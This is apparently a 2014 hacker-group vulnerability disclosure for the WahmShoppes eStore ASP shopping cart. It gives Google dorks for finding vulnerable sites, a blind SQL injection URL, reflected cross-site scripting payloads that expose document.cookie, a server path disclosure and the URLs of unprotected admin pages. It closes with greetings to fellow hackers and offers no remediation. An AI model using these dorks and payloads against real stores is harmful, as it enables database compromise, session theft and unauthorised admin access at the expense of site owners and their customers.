#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # Title : multiple Vulnerability in "WahmShoppes eStore" # Author : alieye # vendor : http://www.wahmshoppes.com/ # Contact : cseye_ut@xxxxxxxxx # Risk : High # Class: Remote # Google Dork: # inurl:WsError.asp # inurl:store/ We apologize but your request rendered no results # Version: all version # Date: 05/06/2014 #++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1-Blind SQL Injection http://victim.com/store/WsDefault.asp?One=-999 AND 1=1+UNION+SELECT+...etc --------------------------------------------------------- 2-Cross Site Scripting http://victim.com/store/WsError.asp?msg=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E http://victim.com/store/WsRequestpwd.asp?msg=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E --------------------------------------------------------- 3-Information Disclosure in image location http://victim.com/store/thumb.asp?path=X:/server path and domain name/example.jpg --------------------------------------------------------- 4-show admin panel tools http://victim.com/store/frmLeft.asp --------------------------------------------------------- Admin page http://victim.com/store/admin/Default.asp #++++++++++++++++++++++++++++++++++++++++++++++++++++++++ [#] Spt Tnx To ZOD14C , 4l130h1 , bully13 , andelos , 3.14nnph , f4rm4nd3 and all cseye members [#] Thanks To All Iranian Hackers [#] website : http://cseye.vcp.ir/ #++++++++++++++++++++++++++++++++++++++++++++++++++++++++
